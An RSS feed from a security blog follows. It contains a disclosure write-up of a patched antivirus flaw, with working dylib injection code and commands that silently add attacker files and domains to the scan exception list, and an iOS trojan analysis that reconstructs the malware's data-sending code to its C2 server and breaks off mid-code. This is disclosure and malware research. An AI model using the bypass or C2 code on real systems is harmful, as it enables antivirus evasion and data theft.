Syrion Offensive Security & Reverse Engineering https://syrion.me/ Sat, 05 Jul 2025 17:11:29 +0200 Sat, 05 Jul 2025 17:11:29 +0200 Jekyll v3.10.0 macOS NimDoor: DPRK Threat Actors Target Web3 and Crypto Platforms with Nim-Based Malware <p><a href="https://www.sentinelone.com/labs/macos-nimdoor-dprk-threat-actors-target-web3-and-crypto-platforms-with-nim-based-malware/">SentinelOne Blog</a></p> Wed, 02 Jul 2025 00:00:00 +0200 https://syrion.me/macos-nimdoor-dprk-threat-actors-target-web3-and-crypto-platforms-with-nim-based-malware/ https://syrion.me/macos-nimdoor-dprk-threat-actors-target-web3-and-crypto-platforms-with-nim-based-malware/ Malware macOS ReaderUpdate Reforged: Melting Pot of macOS Malware Adds Go to Crystal, Nim and Rust Variants <p><a href="https://www.sentinelone.com/blog/readerupdate-reforged-melting-pot-of-macos-malware-adds-go-to-crystal-nim-and-rust-variants/">SentinelOne Blog</a></p> Tue, 25 Mar 2025 00:00:00 +0100 https://syrion.me/readerupdate-reforged-melting-pot-of-macos-malware-adds-go-to-crystal-nim-and-rust-variants/ https://syrion.me/readerupdate-reforged-melting-pot-of-macos-malware-adds-go-to-crystal-nim-and-rust-variants/ Malware macOS BlueNoroff Hidden Risk: Threat Actor Targets Macs with Fake Crypto News and Novel Persistence <p><a href="https://www.sentinelone.com/labs/bluenoroff-hidden-risk-threat-actor-targets-macs-with-fake-crypto-news-and-novel-persistence/">SentinelLabs Blog</a></p> Thu, 07 Nov 2024 00:00:00 +0100 https://syrion.me/bluenoroff-hidden-risk-threat-actor-targets-macs-with-fake-crypto-news-and-novel-persistence/ https://syrion.me/bluenoroff-hidden-risk-threat-actor-targets-macs-with-fake-crypto-news-and-novel-persistence/ Malware macOS CVE-2024-34456: Trend Micro Antivirus One Dylib Injection <p>During a red teaming activity, we gained access to a company <strong>MacBook</strong>; the <strong>Trend Micro Antivirus One</strong> software was running and prevented us from running our tools without being detected.</p> <p>So, I analyzed the software and found a misconfiguration that allow to inject a custom dylib into the application process.</p> <p>The <a href="https://www.cve.org/CVERecord?id=CVE-2024-34456">CVE-2024-34456</a> has been assigned to this issue, affecting <strong>Trend Micro Antivirus One</strong> version <strong>3.10.3</strong> and below. I reported it on February 6, 2024, and according to <strong>Trend Micro</strong>, following its resolution, the public disclosure was scheduled for today, May 6, 2024.</p> <h2 id="trend-micro-antivirus-one">Trend Micro Antivirus One</h2> <p><strong>Trend Micro Antivirus One</strong> is a virus cleaner that can be used to find malicious software on MacOS, it can be downloaded from the <a href="https://www.google.com/url?sa=t&amp;source=web&amp;rct=j&amp;opi=89978449&amp;url=https://apps.apple.com/it/app/antivirus-one-virus-cleaner/id1068435535%3Fmt%3D12&amp;ved=2ahUKEwjM8dDFqPSFAxV3iv0HHQsSBLAQFnoECBwQAQ&amp;usg=AOvVaw3RssV1FWYjSQBdd7dxgNio">App Store</a>.</p> <p><img src="/assets/images/2024-05-06-CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/img1.png" alt="Screenshot" /> <em><center>Figure 1 - Antivirus One App Store</center></em></p> <p>The user can choose between the free or the paid version.</p> <p><img src="/assets/images/2024-05-06-CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/img2.png" alt="Screenshot" /> <em><center>Figure 2 - Antivirus One Plans</center></em></p> <p>It has several functionality that can be used to scan the device, clean adwares and protect the user from malicious website.</p> <h2 id="analysis">Analysis</h2> <p>Using the <strong>codesign</strong> utility, we can see details about the <strong>Antivirus One</strong> application.</p> <p><img src="/assets/images/2024-05-06-CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/img3.png" alt="Screenshot" /> <em><center>Figure 3 - Antivirus One Codesign</center></em></p> <p>The <strong>hardened runtime</strong> flags are not enabled, this means that we can use the <strong>DYLD_INSERT_LIBRARIES</strong> environment variable to inject a custom dylib into the <strong>Antivirus One</strong> application. <strong>Csaba Fitzl</strong> wrote a well described <a href="https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/">blog post</a> about this vulnerability.</p> <p>The application has several interesting entitlements:</p> <ul> <li><strong>com.apple.security.files.user-selected.read-write</strong>: a Boolean value that indicates whether the app may have read-write access to files the user has selected using an Open or Save dialog.</li> <li><strong>com.apple.security.network.client</strong>: a Boolean value indicating whether your app may open outgoing network connections.</li> <li><strong>com.apple.security.network.server</strong>: a Boolean value indicating whether your app may listen for incoming network connections.</li> </ul> <p>This means that the application can establish and receive connections, and can read and write files selected by the user.</p> <p>From the <strong>Info.plist</strong> file, we can see the <strong>Privacy</strong> keys related to Desktop, Documents, Download and the Photo Library access.</p> <p>When the application is executed, it requires the <strong>Full Disk Access</strong> (<strong>FDA</strong>) to enable the deeper scanning.</p> <p><img src="/assets/images/2024-05-06-CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/img4.png" alt="Screenshot" /> <em><center>Figure 4 - Antivirus One Full Disk Access</center></em></p> <p><img src="/assets/images/2024-05-06-CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/img5.png" alt="Screenshot" /> <em><center>Figure 5 - Full Disk Access</center></em></p> <p>As proof of concept, I tried to bypass the antivirus. However, when it comes to dylib injection, it is possible to achieve multiple actions based on what the application does.</p> <h2 id="av-bypass">AV Bypass</h2> <p>The application allows the user to specify files, folders and URLs that must not be scanned by the antivirus. In the image below we can see the “<strong>Exception List</strong>” functionality.</p> <p><img src="/assets/images/2024-05-06-CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/img6.png" alt="Screenshot" /> <em><center>Figure 6 - Exception List</center></em></p> <p>Using the dylib injection, we can add our own files, folders, and domains to this list. Before that, we need to figure out how the application works, let’s reverse engineering it.</p> <h3 id="reverse-engineering">Reverse Engineering</h3> <p>The main <strong>mach-o</strong> file seems to not have any references related to the exception list, so I tried to look for something in the framework used by the application, and luckily I found the <strong>VirusCleaner</strong> framework.</p> <p><img src="/assets/images/2024-05-06-CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/img7.png" alt="Screenshot" /> <em><center>Figure 7 - Frameworks</center></em></p> <p>Using <strong>Hopper</strong> to reverse engineering the <strong>VirusCleaner</strong> framework we can easily find the method responsible to add object in the exception list.</p> <p><img src="/assets/images/2024-05-06-CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/img8.png" alt="Screenshot" /> <em><center>Figure 8 - VirusCleaner Framework</center></em></p> <p>There are 3 methods:</p> <ul> <li>-[VCConfig addToExceptionFiles:]</li> <li>-[VCConfig addToExceptionFolders:]</li> <li>-[VCConfig addToExceptionDomains:]</li> </ul> <p>Looking at the <strong>addToExceptionFiles</strong> method we can figure out that it opens the <strong>exFiles.plist</strong> file in the path “<strong>/Users/syrion/Library/Containers/com.Trend Micro.DrSafety/Data/Library/Application Support</strong>”” and writes the exception file inside.</p> <p><img src="/assets/images/2024-05-06-CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/img9.png" alt="Screenshot" /> <em><center>Figure 9 - addToExceptionFiles Method</center></em></p> <p>The other methods do the same using the <strong>exFolders.plist</strong> and <strong>exDomains.plist</strong> files in the same path.</p> <p><img src="/assets/images/2024-05-06-CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/img10.png" alt="Screenshot" /> <em><center>Figure 10 - Exception Files</center></em></p> <p>These plists contain a list of the exceptions, for example in the image below we can see the <strong>exFile.plist</strong> content when we add a file to the exceptions.</p> <p><img src="/assets/images/2024-05-06-CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/img11.png" alt="Screenshot" /> <em><center>Figure 11 - exFiles.plist Content</center></em></p> <h3 id="dylib-development">Dylib Development</h3> <p>At this point we need to craft a dylib that add the exceptions, for this purpose, I want to add the following exceptions:</p> <ul> <li>The file: “<strong>/tmp/poc/proof.txt</strong>”</li> <li>The folder: :”<strong>/tmp/poc</strong>”</li> <li>The url: “<strong>https://syrion.me</strong>”</li> </ul> <p>We need to import the <strong>VirusCleaner</strong> framework and use the three methods. We can dump classes and methods using the <a href="https://github.com/nygard/class-dump">class-dump</a> tool.</p> <p><img src="/assets/images/2024-05-06-CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/img12.png" alt="Screenshot" /> <em><center>Figure 12 - Class-dump Result</center></em></p> <p>We can create our dylib as shown below.</p> <div class="language-objective_c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#import &lt;Foundation/Foundation.h&gt; #import &lt;dlfcn.h&gt; #import &lt;Cocoa/Cocoa.h&gt; </span> <span class="k">@interface</span> <span class="nc">VCConfig</span> <span class="p">:</span> <span class="nc">NSObject</span> <span class="p">{</span> <span class="n">NSMutableOrderedSet</span> <span class="o">*</span><span class="n">_exceptionFiles</span><span class="p">;</span> <span class="n">NSMutableOrderedSet</span> <span class="o">*</span><span class="n">_exceptionFolders</span><span class="p">;</span> <span class="n">NSMutableOrderedSet</span> <span class="o">*</span><span class="n">_exceptionDomains</span><span class="p">;</span> <span class="p">}</span> <span class="k">+</span> <span class="p">(</span><span class="n">id</span><span class="p">)</span><span class="n">sharedInstance</span><span class="p">;</span> <span class="k">@property</span><span class="p">(</span><span class="n">retain</span><span class="p">)</span> <span class="n">NSMutableOrderedSet</span> <span class="o">*</span><span class="n">exceptionDomains</span><span class="p">;</span> <span class="c1">// @synthesize exceptionDomains=_exceptionDomains;</span> <span class="k">@property</span><span class="p">(</span><span class="n">retain</span><span class="p">)</span> <span class="n">NSMutableOrderedSet</span> <span class="o">*</span><span class="n">exceptionFolders</span><span class="p">;</span> <span class="c1">// @synthesize exceptionFolders=_exceptionFolders;</span> <span class="k">@property</span><span class="p">(</span><span class="n">retain</span><span class="p">)</span> <span class="n">NSMutableOrderedSet</span> <span class="o">*</span><span class="n">exceptionFiles</span><span class="p">;</span> <span class="c1">// @synthesize exceptionFiles=_exceptionFiles;</span> <span class="k">-</span> <span class="p">(</span><span class="kt">void</span><span class="p">)</span><span class="nf">removeFromExceptionDomains</span><span class="p">:(</span><span class="n">id</span><span class="p">)</span><span class="nv">arg1</span><span class="p">;</span> <span class="k">-</span> <span class="p">(</span><span class="kt">void</span><span class="p">)</span><span class="nf">addToExceptionDomains</span><span class="p">:(</span><span class="n">id</span><span class="p">)</span><span class="nv">arg1</span><span class="p">;</span> <span class="k">-</span> <span class="p">(</span><span class="kt">void</span><span class="p">)</span><span class="nf">removeFromExceptionFolders</span><span class="p">:(</span><span class="n">id</span><span class="p">)</span><span class="nv">arg1</span><span class="p">;</span> <span class="k">-</span> <span class="p">(</span><span class="kt">void</span><span class="p">)</span><span class="nf">addToExceptionFolders</span><span class="p">:(</span><span class="n">id</span><span class="p">)</span><span class="nv">arg1</span><span class="p">;</span> <span class="k">-</span> <span class="p">(</span><span class="kt">void</span><span class="p">)</span><span class="nf">removeFromExceptionFile</span><span class="p">:(</span><span class="n">id</span><span class="p">)</span><span class="nv">arg1</span><span class="p">;</span> <span class="k">-</span> <span class="p">(</span><span class="kt">void</span><span class="p">)</span><span class="nf">addToExceptionFiles</span><span class="p">:(</span><span class="n">id</span><span class="p">)</span><span class="nv">arg1</span><span class="p">;</span> <span class="k">-</span> <span class="p">(</span><span class="n">id</span><span class="p">)</span><span class="n">init</span><span class="p">;</span> <span class="k">@end</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">pwn</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span> <span class="n">NSLog</span><span class="p">(</span><span class="s">@"[+] Injected to %@"</span><span class="p">,</span> <span class="p">[[</span><span class="n">NSBundle</span> <span class="nf">mainBundle</span><span class="p">]</span> <span class="nf">bundleIdentifier</span><span class="p">]);</span> <span class="n">NSString</span> <span class="o">*</span><span class="n">virus_cleaner</span> <span class="o">=</span> <span class="s">@"/Applications/Antivirus One.app/Contents/Frameworks/VirusCleaner.framework/Versions/Current/VirusCleaner"</span><span class="p">;</span> <span class="kt">void</span> <span class="o">*</span><span class="n">frameworkHandle</span> <span class="o">=</span> <span class="n">dlopen</span><span class="p">([</span><span class="n">virus_cleaner</span> <span class="nf">UTF8String</span><span class="p">],</span> <span class="n">RTLD_NOW</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">frameworkHandle</span><span class="p">)</span> <span class="p">{</span> <span class="n">NSLog</span><span class="p">(</span><span class="s">@"[+] VirusCleaner Framework loaded"</span><span class="p">);</span> <span class="n">Class</span> <span class="n">VCConfigClass</span> <span class="o">=</span> <span class="nb">nil</span><span class="p">;</span> <span class="n">VCConfigClass</span> <span class="o">=</span> <span class="n">NSClassFromString</span><span class="p">(</span><span class="s">@"VCConfig"</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">VCConfigClass</span> <span class="o">==</span> <span class="nb">nil</span><span class="p">){</span> <span class="n">NSLog</span><span class="p">(</span><span class="s">@"[-] Error: couldn't obtain VCConfig class"</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> <span class="n">VCConfig</span> <span class="o">*</span><span class="n">info</span> <span class="o">=</span> <span class="p">[[</span><span class="n">VCConfigClass</span> <span class="nf">alloc</span><span class="p">]</span> <span class="nf">init</span><span class="p">];</span> <span class="n">VCConfig</span> <span class="o">*</span><span class="n">info_shared</span> <span class="o">=</span> <span class="p">[</span><span class="n">VCConfigClass</span> <span class="nf">sharedInstance</span><span class="p">];</span> <span class="n">NSLog</span><span class="p">(</span><span class="s">@"[+] addToExceptionFiles"</span><span class="p">);</span> <span class="p">[</span><span class="n">info_shared</span> <span class="nf">addToExceptionFiles</span><span class="p">:</span><span class="s">@"/tmp/poc/proof.txt"</span><span class="p">];</span> <span class="n">NSLog</span><span class="p">(</span><span class="s">@"[+] addToExceptionFolders"</span><span class="p">);</span> <span class="p">[</span><span class="n">info_shared</span> <span class="nf">addToExceptionFolders</span><span class="p">:</span><span class="s">@"/tmp/poc"</span><span class="p">];</span> <span class="n">NSLog</span><span class="p">(</span><span class="s">@"[+] addToExceptionDomains"</span><span class="p">);</span> <span class="p">[</span><span class="n">info_shared</span> <span class="nf">addToExceptionDomains</span><span class="p">:</span><span class="s">@"https://syrion.me"</span><span class="p">];</span> <span class="p">[</span><span class="n">task</span> <span class="nf">resume</span><span class="p">];</span> <span class="n">dlclose</span><span class="p">(</span><span class="n">frameworkHandle</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">NSLog</span><span class="p">(</span><span class="s">@"[-] Error: %s"</span><span class="p">,</span> <span class="n">dlerror</span><span class="p">());</span> <span class="p">}</span> <span class="p">}</span> </code></pre></div></div> <p>We define the <strong>VCConfig</strong> interface and its properties and methods (from the <strong>class-dump</strong> output), then using <strong>dlopen</strong> we open the <strong>VirusCleaner</strong> framework, with <strong>NSClassFromString</strong> we get the reference to the <strong>VCConfig</strong> class, and at this point we can allocate an instance of <strong>VCConfig</strong> and call the three methods in order to add the file “<strong>/tmp/poc/proof.txt</strong>”, the folder “<strong>/tmp/poc</strong>” and the url “<strong>https://syrion.me</strong>” in the exception list.</p> <p>We can compile the dylib as shown below.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gcc <span class="nt">-dynamiclib</span> <span class="nt">-framework</span> Foundation <span class="nt">-framework</span> AVFoundation <span class="nt">-framework</span> Cocoa bypass_av.m <span class="nt">-o</span> /tmp/bypass_av.dylib </code></pre></div></div> <h3 id="dylib-injection">Dylib Injection</h3> <p>In order to inject the dylib, we can use the following command.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>open /Application/Antivirus<span class="se">\ </span>One.app –-env <span class="nv">DYLD_INSERT_LIBRARIES</span><span class="o">=</span>/tmp/bypass_av.dylib </code></pre></div></div> <p>To make the new exception list effective we need to kill the <strong>Antivirus One</strong> application before inject our dylib or to restart it.</p> <p><img src="/assets/images/2024-05-06-CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/img13.png" alt="Screenshot" /> <em><center>Figure 13 - Dylib Injection</center></em></p> <p>We need to restart <strong>Antivirus One</strong> application to make the new exception list effective, after that we can find our file, folder and url in the exception list!</p> <p><img src="/assets/images/2024-05-06-CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/img14.png" alt="Screenshot" /> <em><center>Figure 14 - Files Exception List</center></em></p> <p><img src="/assets/images/2024-05-06-CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/img15.png" alt="Screenshot" /> <em><center>Figure 15 - Folders Exception List</center></em></p> <p><img src="/assets/images/2024-05-06-CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/img16.png" alt="Screenshot" /> <em><center>Figure 16 - Domains Exception List</center></em></p> <h2 id="conclusion">Conclusion</h2> <p>The dylib process injection is a rather straightforward vulnerability, yet it could grant an attacker multiple capability. In this blog post, we have seen how it is possible to bypass the <strong>Antivirus One</strong> scan. However, in general, it is possible to exploit anything related to application permissions. For example, in the proof of concept I sent to <strong>Trend Micro</strong>, my dylib also made a HTTP request to the malicious URL (the one my dylib adds in the domains exception list).</p> <p><strong>Trend Micro</strong> fixed the vulnerability in <strong>Antivirus One Version 3.10.4</strong>, and the <a href="https://www.cve.org/CVERecord?id=CVE-2024-34456">CVE-2024-34456</a> was assigned to the vulnerability.</p> <p>The AV bypass could also be exploited in an easier way, but for the purpose of this blog post, I was interested in demonstrating the use of dylib injection to achieve this goal.</p> <h2 id="references">References</h2> <ul> <li><a href="https://www.cve.org/CVERecord?id=CVE-2024-34456">https://www.cve.org/CVERecord?id=CVE-2024-34456</a></li> <li><a href="https://helpcenter.trendmicro.com/en-us/article/tmka-18372">https://helpcenter.trendmicro.com/en-us/article/tmka-18372</a></li> <li><a href="https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/">https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/</a></li> <li><a href="https://wojciechregula.blog/post/macos-red-teaming-bypass-tcc-with-old-apps/">https://wojciechregula.blog/post/macos-red-teaming-bypass-tcc-with-old-apps/</a></li> <li><a href="https://developer.apple.com/documentation/security/hardened_runtime?langua&amp;language=objc">https://developer.apple.com/documentation/security/hardened_runtime?langua&amp;language=objc</a></li> </ul> Mon, 06 May 2024 00:00:00 +0200 https://syrion.me/CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/ https://syrion.me/CVE-2024-34456-trend-micro-antivirus-one-dylib-injection/ macOS Vulnerability Gold Pickaxe iOS Technical Analysis: IPA Overview and C2 Communication Start up <p>In February 2024 <strong>Group-IB</strong> wrote a <a href="https://www.group-ib.com/blog/goldfactory-ios-trojan/">blog post</a> about a mobile <strong>Trojan</strong> developed by a Chinese-speaking cybercrimine group called <strong>Gold Pickaxe</strong>.</p> <p>This malware targets both <strong>iOS</strong> and <strong>Android</strong> users in the Asia Pacific region in order to collect identity documents, SMS, pictures and other data related to the compromised phones.</p> <p>The malware communicates with the C2 using two protocols:</p> <ul> <li>The <strong>websocket</strong> protocol used to listen for incoming commands</li> <li>The <strong>HTTP</strong> protocol used to send information and data to the <strong>C2</strong></li> </ul> <p>In this article we are going to analyse the <strong>IPA</strong> file, and then describe how the malware connects to the <strong>C2 websocket</strong> server.</p> <p>How the malware listens for incoming commands and executes them are not in the scope of this blog post.</p> <h1 id="technical-analysis">Technical Analysis</h1> <h2 id="ipa-overview">IPA Overview</h2> <p>The <strong>SHA-256</strong> of the <strong>IPA</strong> file is <strong>4571f8c8560a8a66a90763d7236f55273750cf8dd8f4fdf443b5a07d7a93a3df</strong>, and it is reported as malicious on <a href="https://www.virustotal.com/gui/file/4571f8c8560a8a66a90763d7236f55273750cf8dd8f4fdf443b5a07d7a93a3df">VirusTotal</a>.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img1.png" alt="Screenshot" /> <em><center>Figure 1 - VirusTotal Digital Pensions.ipa</center></em></p> <p>The application bundle contains all the application files, there are interesting files related to the <strong>fast reverse proxy</strong> configuration, the <strong>html</strong> pages shown to the user, and a <strong>plugin</strong> used to intercept sms.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img2.png" alt="Screenshot" /> <em><center>Figure 2 - Chinp.app Bundle</center></em></p> <p>The iOS application is signed with the following information:</p> <ul> <li><strong>Bundle ID</strong>: com.want.long.chinp</li> <li><strong>Associated Domain</strong>: apple.hzc5[.]xyz</li> <li><strong>Developer Team ID</strong>: 27S3W42PY8</li> </ul> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img3.png" alt="Screenshot" /> <em><center>Figure 3 - Chinp.app Codesign</center></em></p> <p>Obviously the associated domain is reported as malicious.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img4.png" alt="Screenshot" /> <em><center>Figure 4 - VirusTotal Associated Domain</center></em></p> <p>Analyzing the <strong>Info.plist</strong> file, we can see interesting information: the application name is <strong>Digital Pensions</strong>, the bundle id is <strong>com.want.long.chinp</strong>, furthermore the following settings let us know that the malware accesses the photo library and camera:</p> <ul> <li>Privacy - Photo Library Usage Description</li> <li>Privacy - Photo Library Additions Usage Description</li> <li>Privacy - Camera Usage Description</li> </ul> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img5.png" alt="Screenshot" /> <em><center>Figure 5 - Chinp.app Info.plist</center></em></p> <p>The <strong>config.ini</strong> file contains information related to the <strong>fast reverse proxy</strong> configuration as shown in the image below.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img6.png" alt="Screenshot" /> <em><center>Figure 6 - FRP Con</center></em></p> <p>The values “<strong>#server_addr</strong>”, “<strong>#server_port</strong>”,”<strong>#token</strong>”, “<strong>#adid</strong>” and “<strong>#remote_port</strong>” will be replaced with values received from the <strong>C2</strong>.</p> <p>The plugins folder contains an extension called <strong>messagefilter.appex</strong>, according to <strong>Group-IB</strong> due to Apple restrictions, this extension can only intercept SMS received from numbers that are not in the contact list</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img7.png" alt="Screenshot" /> <em><center>Figure 7 - messagefilter.appex Content</center></em></p> <p>In the extension <strong>Info.plist</strong> we can find the URL used to exfiltrate the intercepted sms.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img8.png" alt="Screenshot" /> <em><center>Figure 8 - C2 SMS Url</center></em></p> <p>The <strong>mach-o</strong> file contains chinese language strings used in logs and thai language strings that are shown to the user, this confirms that the app is developed by a Chinese-speaking group targetting thai users.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img9.png" alt="Screenshot" /> <em><center>Figure 9 - Chinese and Thai Strings</center></em></p> <h1 id="reverse-engineering">Reverse Engineering</h1> <h2 id="identify-the-device">Identify The Device</h2> <p>The malware identifies each victim using an <strong>Identifiers for Advertisers</strong> (<strong>IDFA</strong>), the <strong>IDFA</strong> is sent in every <strong>HTTP</strong> request in order to identify the device. The <strong>+[commonUtils getAdid]</strong> method is executed to obtain the <strong>IDFA</strong>, it is just a wrapper for the <strong>+[SimulateIDFA createSimulateIDFA]</strong> method as shown in the image below.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img10.png" alt="Screenshot" /> <em><center>Figure 10 - getAdid method</center></em></p> <p>The <a href="https://github.com/youmi/SimulateIDFA">SimulateIDFA</a> project is publicly available on github, the <strong>createSimulateIDFA</strong> method is the same of the github project.</p> <p>It is possible to recognize the entire method in the disassembler; for example, in the following image, we can see the <strong>carrierInfo</strong> function.</p> <p><img src="/assets/images/2024-04-19-goldpickaxe-technical-analysis-ipa-c2/img11.png" alt="Screenshot" /> <em><center>Figure 11 - carrierInfo Function</center></em></p> <h2 id="http-requests">HTTP Requests</h2> <p>The Malware sends data and information to the <strong>C2</strong> using the <strong>HTTP</strong> protocol, it uses the <strong>AFHTTPSessionManager</strong> class to execute a <strong>HTTP Post</strong> Request via the <a href="https://asciidoxy.org/examples/objc/example-objc.html#objc-interfaceAFHTTPSessionManager_1af5ad6a2e3df65803070fcb6418b7e0fc">POST:parameters:headers:constructingBodyWithBlock:progress:success:failure:</a> method.</p> <p>We can see the method details below.</p> <div class="language-objective_c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">-</span> <span class="p">(</span><span class="n">nullable</span> <span class="n">NSURLSessionDataTask</span> <span class="o">*</span><span class="p">)</span><span class="nf">POST</span><span class="p">:(</span><span class="n">NSString</span> <span class="o">*</span><span class="p">)</span><span class="nv">URLString</span> <span class="nf">parameters</span><span class="p">:(</span><span class="n">nullable</span> <span class="n">id</span><span class="p">)</span><span class="nv">parameters</span> <span class="nf">headers</span><span class="p">:(</span><span class="n">nullable</span> <span class="n">NSDictionary</span><span class="o">&lt;</span><span class="n">NSString</span> <span class="o">*</span><span class="p">,</span> <span class="n">NSString</span> <span class="o">*&gt;</span> <span class="o">*</span><span class="p">)</span><span class="nv">headers</span> <span class="nf">constructingBodyWithBlock</span><span class="p">:(</span><span class="n">nullable</span> <span class="kt">void</span><span class="p">(</span><span class="n">id</span><span class="o">&lt;</span><span class="n">AFMultipartFormData</span><span class="o">&gt;</span> <span class="n">formData</span><span class="p">))</span><span class="nv">block</span> <span class="nf">progress</span><span class="p">:(</span><span class="n">nullable</span> <span class="kt">void</span><span class="p">(</span><span class="n">NSProgress</span> <span class="o">*</span> <span class="n">uploadProgress</span><span class="p">))</span><span class="nv">uploadProgress</span> <span class="nf">success</span><span class="p">:(</span><span class="n">nullable</span> <span class="kt">void</span><span class="p">(</span><span class="n">NSURLSessionDataTask</span> <span class="o">*</span> <span class="n">task</span><span class="p">,</span> <span class="n">id</span> <span class="n">_Nullable</span> <span class="n">responseObject</span><span class="p">))</span><span class="nv">success</span> <span class="nf">failure</span><span class="p">:(</span><span class="n">nullable</span> <span class="kt">void</span><span class="p">(</span><span class="n">NSURLSessionDataTask</span> <span class="o">*</span><span class="n">_Nullable</span> <span class="n">task</span><span class="p">,</span> <span class="n">NSError</span> <span class="o">*</span> <span class="n">error</span><span class="p">))</span><span class="nv">failure</span><span class="p">;</span> </code></pre></div></div> <p>Parameters:</p> <ul> <li><strong>POST</strong>: the URL string used to create the request URL</li> <li><strong>parameters</strong>: the parameters to be encoded according to the client request serializer</li> <li><strong>headers</strong>: the headers appended to the default headers for this request</li> <li><strong>constructingBodyWithBlock</strong>: a block that takes a single argument and appends data to the HTTP body. The block argument is an object adopting the AFMultipartFormData protocol</li> <li><strong>progress</strong>: a block object to be executed when the upload progress is updated. Note this block is called on the session queue, not the main queue</li> <li><strong>success</strong>: a block object to be executed when the task finishes successfully. This block has no return value and takes two arguments: the data task, and the response object created by the client response serializer</li> <li><strong>failure</strong>: a block object to be executed when the task finishes unsuccessfully, or that finishes successfully, but encountered an error while parsing the response data. This block has no return value and takes a two arguments: the data task and the error describing the network or parsing error that occurred</li> </ul> <p>Based on the specific API used by the malware some parameters can be set or not and in some case they can be different.</p> <p>For example <strong>(nullable id)parameters</strong> is a Dictionary contains the parameters that are send to the <strong>C2</strong> , each parameter is a key-value pair. The <strong>adid</strong> key with the <strong>IDFA</strong> value is send in each request, other parameters depends on the specific API purpose (for example the API used to send crash information has another parameter contains a string representing the crash details). Some API can set or not the <strong>block</strong>, <strong>success</strong> and <strong>failure</strong> params in order to execute specific function if the request succeeds or fails. A generic snippet of the <strong>HTTP</strong> request is the following.</p> <div class="language-objective_c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">AFHTTPSessionManager</span> <span class="o">*</span><span class="n">manager</span> <span class="o">=</span> <span class="p">[</span><span class="n">AFHTTPSessionManager</span> <span class="nf">manager</span><span class="p">];</span> <span class="p">[</span><span class="n">manager</span> <span class="nf">setResponseSerializer</span><span class="p">:[</span><span class="n">AFHTTPResponseSerializer</span> <span class="nf">serializer</span><span class="p">]];</span> <span class="n">NSString</span> <span class="o">*</span><span class="n">urlString</span> <span class="o">=</span> <span class="p">[</span><span class="n">NSString</span> <span class="nf">stringWithFormat</span><span class="p">:</span><span class="s">@"%@%@"</span><span class="p">,</span> <span class="s">@"http://hzc5[.]xyz"</span><span class="p">,</span> <span class="s">@"/api/apple/xxxx"</span><span class="p">];</span> <span class="n">NSString</span> <span class="o">*</span><span class="n">keys</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="s">@"adid"</span><span class="p">,</span> <span class="p">...</span> <span class="cm">/* keys */</span><span class="p">};</span> <span class="n">NSString</span> <span class="o">*</span><span class="n">objects</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{[</span><span class="n">CommonUtils</span> <span class="nf">getAdid</span><span class="p">],</span> <span class="p">...,</span> <span class="cm">/* values */</span><span class="p">};</span> <span class="n">NSDictionary</span> <span class="o">*</span><span class="n">parameters</span> <span class="o">=</span> <span class="p">[</span><span class="n">NSDictionary</span> <span class="nf">dictionaryWithObjects</span><span class="p">:</span><span class="n">objects</span> <span class="nl">forKeys:</span><span class="n">keys</span> <span class="nl">count:</span> <span class="cm">/* number of parameters */</span> <span class="p">];</span> <span class="p">[</span><span class="n">manager</span> <span class="nf">POST</span><span class="p">:</span><span class="n">urlString</span> <span class="nl">parameters:</span><span class="n">parameters</span> <span class="nl">headers:</span><span class="nb">nil</span> <span class="nl">constructingBodyWithBlock:</span> <span class="cm">/* can be set or not */</span> <span class="nl">progress:</span><span class="nb">nil</span> <span class="nl">success:</span><span class="nb">nil</span> <span class="cm">/* can be set or not */</span> <span 